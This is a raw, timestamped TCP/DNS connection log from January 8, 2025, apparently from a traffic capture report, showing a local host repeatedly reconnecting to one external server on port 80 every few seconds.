                                                    Jan 8, 2025 08:42:21.269119024 CET8049750176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:21.269186974 CET4975080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:22.789477110 CET4975080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:22.789916039 CET4975180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:22.794533968 CET8049750176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:22.794730902 CET8049751176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:22.794806004 CET4975080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:22.794845104 CET4975180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:22.795001030 CET4975180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:22.799828053 CET8049751176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:23.498547077 CET8049751176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:23.498610973 CET4975180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:25.133183002 CET4975180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:25.133495092 CET4975280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:25.138350010 CET8049752176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:25.138434887 CET8049751176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:25.138528109 CET4975180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:25.138537884 CET4975280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:25.138719082 CET4975280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:25.143512964 CET8049752176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:25.831198931 CET8049752176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:25.831264019 CET4975280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:27.336713076 CET4975280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:27.336977959 CET4975380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:27.341828108 CET8049753176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:27.341856956 CET8049752176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:27.341975927 CET4975280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:27.341989040 CET4975380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:27.342251062 CET4975380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:27.347016096 CET8049753176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:28.049412012 CET8049753176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:28.049493074 CET4975380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:29.683504105 CET4975380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:29.683722973 CET4975480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:29.688565969 CET8049754176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:29.688672066 CET4975480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:29.688694954 CET8049753176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:29.688745975 CET4975380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:29.688921928 CET4975480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:29.693641901 CET8049754176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:30.393450022 CET8049754176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:30.393543005 CET4975480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:31.898890018 CET4975480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:31.899281979 CET4975580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:31.904186010 CET8049755176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:31.904272079 CET8049754176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:31.904314041 CET4975580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:31.904361010 CET4975480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:31.904637098 CET4975580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:31.916625977 CET8049755176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:32.618551016 CET8049755176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:32.618664980 CET4975580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:34.242624044 CET4975580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:34.242984056 CET4975680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:34.247775078 CET8049755176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:34.247821093 CET8049756176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:34.247900963 CET4975580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:34.247946024 CET4975680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:34.248143911 CET4975680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:34.252983093 CET8049756176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:34.952279091 CET8049756176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:34.952385902 CET4975680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:36.461318970 CET4975680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:36.461678982 CET4975780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:36.466409922 CET8049756176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:36.466483116 CET8049757176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:36.466506004 CET4975680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:36.466561079 CET4975780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:36.466681957 CET4975780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:36.471400023 CET8049757176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:37.175318003 CET8049757176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:37.175436020 CET4975780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:38.805197954 CET4975780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:38.805628061 CET4975880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:38.810290098 CET8049757176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:38.810380936 CET4975780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:38.810442924 CET8049758176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:38.810524940 CET4975880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:38.810637951 CET4975880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:38.815438032 CET8049758176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:39.525396109 CET8049758176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:39.525481939 CET4975880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:41.041609049 CET4975880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:41.041773081 CET4975980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:41.046653986 CET8049759176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:41.046721935 CET4975980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:41.046761036 CET8049758176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:41.046830893 CET4975880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:41.046906948 CET4975980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:41.051667929 CET8049759176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:41.234036922 CET5580753192.168.2.4162.159.36.2
                                                    Jan 8, 2025 08:42:41.238842964 CET5355807162.159.36.2192.168.2.4
                                                    Jan 8, 2025 08:42:41.238933086 CET5580753192.168.2.4162.159.36.2
                                                    Jan 8, 2025 08:42:41.243747950 CET5355807162.159.36.2192.168.2.4
                                                    Jan 8, 2025 08:42:41.684176922 CET5580753192.168.2.4162.159.36.2
                                                    Jan 8, 2025 08:42:41.689265013 CET5355807162.159.36.2192.168.2.4
                                                    Jan 8, 2025 08:42:41.689312935 CET5580753192.168.2.4162.159.36.2
                                                    Jan 8, 2025 08:42:41.763613939 CET8049759176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:41.763864040 CET4975980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:43.383187056 CET4975980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:43.383572102 CET5581080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:43.390249968 CET8049759176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:43.390341997 CET4975980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:43.390366077 CET8055810176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:43.390479088 CET5581080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:43.390624046 CET5581080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:43.397217035 CET8055810176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:44.077456951 CET8055810176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:44.077644110 CET5581080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:45.586549044 CET5581080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:45.586832047 CET5581180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:45.591665030 CET8055810176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:45.591686010 CET8055811176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:45.591741085 CET5581080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:45.591788054 CET5581180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:45.591969013 CET5581180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:45.596720934 CET8055811176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:46.302700996 CET8055811176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:46.302886009 CET5581180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:47.930342913 CET5581180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:47.931793928 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:47.935425043 CET8055811176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:47.935496092 CET5581180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:47.936594963 CET8055812176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:47.936665058 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:47.936800957 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:47.941591024 CET8055812176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:48.624346018 CET8055812176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:48.624556065 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.135092020 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.135385990 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.140274048 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.140352011 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.140458107 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.140716076 CET8055812176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.140770912 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.145225048 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.835179090 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.835269928 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.461291075 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.461633921 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.466624022 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:52.466710091 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.466824055 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.468065023 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:52.468123913 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.471609116 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:53.154411077 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:53.154721022 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.664371967 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.664676905 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.669522047 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:54.669656992 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.669842958 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.674854040 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:54.677700043 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:54.677752018 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:55.380978107 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:55.381033897 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.167953968 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.168278933 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.173060894 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.173079014 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.173140049 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.173186064 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.173350096 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.178136110 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.863358021 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.863585949 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.398680925 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.399061918 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.403784037 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:59.403835058 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.403847933 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:59.403906107 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.404030085 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.408792973 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:00.109401941 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:00.109510899 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.728663921 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.728962898 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.733776093 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:01.733803034 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:01.733865976 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.733891964 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.734025002 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.738773108 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:02.419342995 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:02.419395924 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.930053949 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.930367947 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.934998989 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:03.935060024 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.935139894 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:03.935195923 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.935311079 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:03.940135002 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:04.628889084 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:04.628948927 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.259907961 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.260176897 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.264858961 CET8055869176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.264919043 CET5586980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.264957905 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.265022039 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.265182018 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:06.269922018 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.970510960 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:06.970566988 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.478696108 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.478971004 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.483678102 CET8055885176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:08.483721972 CET5588580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.483745098 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:08.483803034 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.483939886 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:08.488661051 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:09.181086063 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:09.181140900 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.806833029 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.807140112 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.811933041 CET8055897176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:10.811949968 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:10.812000036 CET5589780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.812037945 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.812190056 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:10.816999912 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:11.501291037 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:11.501351118 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.010745049 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.011065006 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.017719030 CET8055913176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.017770052 CET5591380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.017829895 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.017889023 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.018024921 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:13.025103092 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.708719969 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:13.708822012 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.338334084 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.338548899 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.343390942 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:15.343422890 CET8055929176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:15.343456984 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.343485117 CET5592980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.343653917 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:15.348439932 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:16.047466993 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:16.047627926 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.558701038 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.559037924 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.566035986 CET8055945176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:17.566054106 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:17.566090107 CET5594580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.566135883 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.566282988 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:17.572271109 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:18.273776054 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:18.273842096 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.902106047 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.902360916 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.907087088 CET8055961176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:19.907154083 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:19.907162905 CET5596180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.907239914 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.907335043 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:19.912060976 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:20.603780031 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:20.603840113 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.119375944 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.119703054 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.124507904 CET8055976176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.124526024 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.124567032 CET5597680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.124627113 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.124735117 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:22.129561901 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.831617117 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:22.831687927 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.464718103 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.465187073 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.469757080 CET8055988176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:24.469953060 CET5598880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.470134020 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:24.470344067 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.470468044 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:24.475217104 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:25.156790018 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:25.156971931 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.668210030 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.668234110 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.673197985 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:26.673326969 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.673631907 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:26.678263903 CET8056004176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:26.678383112 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:26.678853035 CET5600480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:27.388703108 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:27.388772964 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.009989977 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.010410070 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.015100956 CET8056020176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.015201092 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.020263910 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.020263910 CET5602080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.020411015 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:29.025160074 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.707614899 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:29.707674980 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.213639021 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.213643074 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.218669891 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.218775988 CET8056036176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.220284939 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.220285892 CET5603680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.220406055 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:31.225238085 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.919856071 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:31.919920921 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.541714907 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.542052984 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.546845913 CET8056051176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:33.546869993 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:33.546897888 CET5605180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.546948910 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.547056913 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:33.551897049 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:34.257252932 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:34.257354975 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.760250092 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.760590076 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.765239000 CET8056067176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:35.765295029 CET5606780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.765794992 CET8056083176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:35.765866995 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.766031981 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:35.770744085 CET8056083176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:36.481360912 CET8056083176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:36.481427908 CET5608380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:38.104466915 CET5608380192.168.2.4176.113.115.131
